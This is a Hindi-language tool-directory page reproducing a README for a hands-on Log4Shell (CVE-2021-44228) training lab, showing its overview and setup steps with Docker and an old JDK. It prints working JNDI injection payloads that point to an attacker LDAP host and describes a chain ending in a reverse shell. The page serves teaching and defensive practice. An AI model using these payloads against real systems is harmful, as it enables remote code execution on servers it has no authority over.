Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Log4Shell-CVE-2021-44228 — # Log4Shell (CVE-2021-44228) को समझने और उसका शोषण करने के लिए व्यावहारिक प्रयोगशाला Docker, Kali Linux, Burp Suite और log4j-shell-poc का उपयोग करके Log4Shell (CVE-2021-44228) का शोषण और समझने के लिए व्यावहारिक प्रयोगशाला। केवल नियंत्रित प्रयोगशाला वातावरण में शिक्षण और रक्षात्मक प्रशिक्षण के लिए। | Kitploit
उपकरण/GitHubGitHub/drhaitham/log4shell-cve-2021-44228
पेलोड जनरेशनभेद्यता विश्लेषणशोषणरिवर्स इंजीनियरिंगवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षारेड टीमिंग
लैब और अभ्यास
GitHubdrhaitham/log4shell-cve-2021-44228

Log4Shell-CVE-2021-44228

रिपॉजिटरी देखें
149 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

# Log4Shell (CVE-2021-44228) को समझने और उसका शोषण करने के लिए व्यावहारिक प्रयोगशाला Docker, Kali Linux, Burp Suite और log4j-shell-poc का उपयोग करके Log4Shell (CVE-2021-44228) का शोषण और समझने के लिए व्यावहारिक प्रयोगशाला। केवल नियंत्रित प्रयोगशाला वातावरण में शिक्षण और रक्षात्मक प्रशिक्षण के लिए।

साझा करें

Log4Shell (CVE-2021-44228) का शोषण: एक संपूर्ण, आधुनिक प्रदर्शन प्रयोगशाला

Log4Shell (CVE-2021-44228) अब तक खोजी गई सबसे प्रभावशाली रिमोट कोड निष्पादन भेद्यताओं में से एक है। यह Apache Log4j 2 को प्रभावित करता है, जो एक व्यापक रूप से उपयोग किया जाने वाला Java लॉगिंग फ्रेमवर्क है, और हमलावरों को लॉग संदेशों में JNDI लुकअप का दुरुपयोग करके मनमाना कोड निष्पादित करने की अनुमति देता है।

यह मार्गदर्शिका निम्नलिखित का उपयोग करके एक पूर्ण, पुनरुत्पादनीय प्रदर्शन प्रयोगशाला प्रदान करती है:

  • Kali Linux (हमलावर)
  • एक Dockerised कमजोर Log4j2 अनुप्रयोग
  • सार्वजनिक PoC log4j-shell-poc
  • curl, Burp Suite, और Netcat

यह केवल नियंत्रित वातावरणों में शिक्षण, अनुसंधान, प्रशिक्षण और रक्षात्मक जागरूकता के लिए डिज़ाइन किया गया है। संरचना और शैली साथी "Shellshock" प्रयोगशाला README के समान भावना का अनुसरण करते हैं।


📌 सामग्री तालिका

  1. कानूनी और नैतिक नोटिस
  2. उच्च-स्तरीय अवलोकन
  3. सीखने के उद्देश्य
  4. प्रयोगशाला वास्तुकला
  5. पूर्वापेक्षाएँ
  6. Kali पर JDK 1.8.0_202 स्थापित करें
  7. कमजोर Log4j अनुप्रयोग तैनात करें (Docker)
  8. शोषण PoC तैयार करें
  9. poc.py को JDK 1.8.0_202 का उपयोग करने के लिए कॉन्फ़िगर करें
  10. शोषण सेवाएँ प्रारंभ करें (LDAP + HTTP + पेलोड)
  11. रिवर्स शेल श्रोता प्रारंभ करें
  12. curl के माध्यम से Log4Shell का शोषण करें
  13. Burp Suite के माध्यम से Log4Shell का शोषण करें
  14. हमला श्रृंखला आरेख
  15. प्रतिउपाय और रक्षा
  16. चीट शीट (सभी कमांड)
  17. स्क्रीनशॉट गैलरी (वैकल्पिक)
  18. संदर्भ
  19. क्रेडिट

0. कानूनी और नैतिक नोटिस

यह प्रयोगशाला केवल एक नियंत्रित वातावरण में की जानी चाहिए जहाँ आपके पास स्पष्ट प्राधिकरण हो (आपकी अपनी प्रयोगशाला, कक्षा VM, आदि)।

  • उत्पादन प्रणालियों पर हमला न करें।
  • इसे उन होस्टों के विरुद्ध न चलाएं जिनके आप स्वामी या प्रशासक नहीं हैं।
  • इस सामग्री का उपयोग केवल शिक्षा, अनुसंधान और रक्षा के लिए करें।

1. उच्च-स्तरीय अवलोकन

Log4Shell (CVE-2021-44228) Apache Log4j 2 में एक गंभीर RCE भेद्यता है।

समस्या इसलिए उत्पन्न होती है क्योंकि कमजोर Log4j2 संस्करण हमलावर-नियंत्रित स्ट्रिंग्स जैसे:

${jndi:ldap://ATTACKER_IP:1389/a}

की व्याख्या करते हैं।

जब यह स्ट्रिंग लॉग की जाती है, Log4j:

  1. एक JNDI लुकअप करता है (जैसे LDAP के माध्यम से) एक हमलावर-नियंत्रित सर्वर पर।
  2. एक दुर्भावनापूर्ण Java वर्ग का संदर्भ प्राप्त करता है।
  3. HTTP के माध्यम से वर्ग डाउनलोड करता है और इसे JVM में लोड करता है।
  4. इसे निष्पादित करता है, जिससे रिमोट कोड निष्पादन होता है।

इस प्रयोगशाला में, आप:

  • एक Docker कंटेनर के अंदर एक कमजोर Log4j2 वेब अनुप्रयोग चलाएंगे।
  • log4j-shell-poc का उपयोग करके Kali पर एक दुर्भावनापूर्ण LDAP + HTTP सर्वर चलाएंगे।
  • curl और Burp Suite के माध्यम से Log4Shell पेलोड वितरित करेंगे।
  • कमजोर कंटेनर से एक रिवर्स शेल कैप्चर करेंगे।

2. सीखने के उद्देश्य

इस प्रयोगशाला के अंत तक, आपको सक्षम होना चाहिए:

  1. उच्च स्तर पर समझाएं कि Log4Shell कैसे काम करता है और JNDI दुरुपयोग करने पर खतरनाक क्यों है।
  2. Docker का उपयोग करके एक कमजोर Log4j2 अनुप्रयोग तैनात करें।
  3. PoC के लिए आवश्यक JDK 1.8.0_202 स्थापित और कॉन्फ़िगर करें।
  4. PoC स्क्रिप्ट के माध्यम से एक दुर्भावनापूर्ण LDAP सर्वर और HTTP सर्वर चलाएं।
  5. भेद्यता को ट्रिगर करें और एक रिवर्स शेल प्राप्त करें।
  6. Burp Suite का उपयोग करके हमले को एक HTTP हेडर में इंजेक्ट करें।
  7. यथार्थवादी शमन और पता लगाने की रणनीतियों पर चर्चा करें।

3. प्रयोगशाला वास्तुकला

सभी घटक आपके मौजूदा आभासी प्रयोगशाला के शीर्ष पर चलते हैं। इस लेख के लिए हम मानते हैं:

  • Kali Linux VM हमलावर है।
  • Kali कमजोर ऐप वाले Docker कंटेनर को भी चलाता है।
घटकभूमिका / विवरणउपकरण / सेवाएँउदाहरण पता
Kali Linux VM (हमलावर + होस्ट)PoC शोषण, LDAP सर्वर, HTTP सर्वर, Netcat श्रोता, Burp Suite चलाता हैPython 3, JDK 1.8.0_202, Netcat, Burp Suite, Docker, curl, Git192.168.1.4 (उदाहरण Kali IP)
कमजोर Log4j2 वेब अनुप्रयोगलक्ष्य; Spring Boot वेब ऐप Log4Shell के लिए कमजोरDocker छवि: ghcr.io/christophetd/log4shell-vulnerable-apphttp://127.0.0.1:8080 पर उजागर

मुख्य विचार

हमलावर इंजेक्ट करता है:

${jndi:ldap://192.168.1.4:1389/a}

एक HTTP हेडर में। कमजोर ऐप इसे Log4j2 का उपयोग करके लॉग करता है → 192.168.1.4:1389 पर एक JNDI LDAP लुकअप करता है → http://192.168.1.4:8000 से एक दुर्भावनापूर्ण वर्ग डाउनलोड करता है → वर्ग को निष्पादित करता है, जो 192.168.1.4:9001 पर वापस एक रिवर्स शेल खोलता है।


4. पूर्वापेक्षाएँ

Kali पर आपको चाहिए:

  • Docker (स्थापित और काम कर रहा)।
  • Python 3 (Kali पर डिफ़ॉल्ट)।
  • Netcat (nc)।
  • Burp Suite (कम्युनिटी संस्करण ठीक है)।
  • प्रारंभिक डाउनलोड के लिए इंटरनेट एक्सेस।
  • Linux और HTTP की बुनियादी जानकारी।

इस पूरे मार्गदर्शिका में हम मानते हैं कि Kali IP है:

192.168.1.4

यदि आपका IP भिन्न है, तो सभी कमांड को तदनुसार समायोजित करें।


5. Kali पर JDK 1.8.0_202 स्थापित करें (अनिवार्य)

PoC Java SE 8 Update 202 (JDK 1.8.0_202) पर निर्भर करता है क्योंकि बाद के Java संस्करण इस शोषण द्वारा उपयोग किए जाने वाले रिमोट क्लास लोडिंग व्यवहार को प्रतिबंधित करते हैं।

भले ही Kali में पहले से OpenJDK 21 (या समान) हो, फिर भी आपको 8u202 को अलग से स्थापित करना होगा।

5.1 एक कार्यशील निर्देशिका बनाएँ

mkdir -p ~/Log4Shell
cd ~/Log4Shell

5.2 HuaweiCloud मिरर से JDK 8u202 डाउनलोड करें

मिरर रूट:

https://mirrors.huaweicloud.com/java/jdk/8u202-b08/

Linux x64 tarball (≈185 MB) डाउनलोड करें:

wget https://mirrors.huaweicloud.com/java/jdk/8u202-b08/jdk-8u202-linux-x64.tar.gz
ls -lh jdk-8u202-linux-x64.tar.gz   # लगभग 185M होना चाहिए

5.3 /usr/bin/jdk1.8.0_202 में निकालें

sudo mkdir -p /usr/bin/jdk1.8.0_202
sudo tar -xvf jdk-8u202-linux-x64.tar.gz \
  -C /usr/bin/jdk1.8.0_202 --strip-components=1

--strip-components=1 विकल्प संग्रह से शीर्ष-स्तरीय निर्देशिका को हटाता है ताकि फ़ाइलें सीधे /usr/bin/jdk1.8.0_202 के अंतर्गत आ जाएँ।

5.4 स्थापना सत्यापित करें

/usr/bin/jdk1.8.0_202/bin/java -version

अपेक्षित आउटपुट:

java version "1.8.0_202"
Java(TM) SE Runtime Environment (build 1.8.0_202-b08)
Java HotSpot(TM) 64-Bit Server VM (build 25.202-b08, mixed mode)

यदि आप यह देखते हैं, तो JDK 1.8.0_202 सही ढंग से स्थापित है।


6. कमजोर Log4j अनुप्रयोग तैनात करें (Kali पर Docker)

Kali पर एक नए टर्मिनल में (आप ~/Log4Shell में रह सकते हैं):

docker run --name vulnerable-app --rm -p 8080:8080 \
  ghcr.io/christophetd/log4shell-vulnerable-app@sha256:6f88430688108e512f7405ac3c73d47f5c370780b94182854ea2cddc6bd59929

आपको इस प्रकार के लॉग दिखाई देने चाहिए:

:: Spring Boot ::  (v2.6.1)
Tomcat initialized with port(s): 8080 (http)
Tomcat started on port(s): 8080 (http) with context path ''
Started VulnerableAppApplication ...
  • अब ऐप Kali से http://127.0.0.1:8080/ पर पहुंच योग्य है।
  • इस टर्मिनल को चलने दें। यह आपका लक्ष्य है।

त्वरित जाँच:

curl http://127.0.0.1:8080/
टूल डाउनलोड करें